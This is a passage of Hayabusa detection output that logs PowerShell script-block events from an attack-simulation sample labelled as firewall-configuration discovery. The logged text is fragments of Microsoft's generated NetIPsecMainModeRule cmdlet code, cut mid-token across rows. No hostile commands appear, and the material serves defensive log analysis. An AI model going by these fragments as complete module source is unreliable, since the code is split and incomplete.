$__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeRule' function Copy-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] 
[string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFire",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"wallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject 
(cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; 
Va",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"lue = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeRule' function Enable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] 
[ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 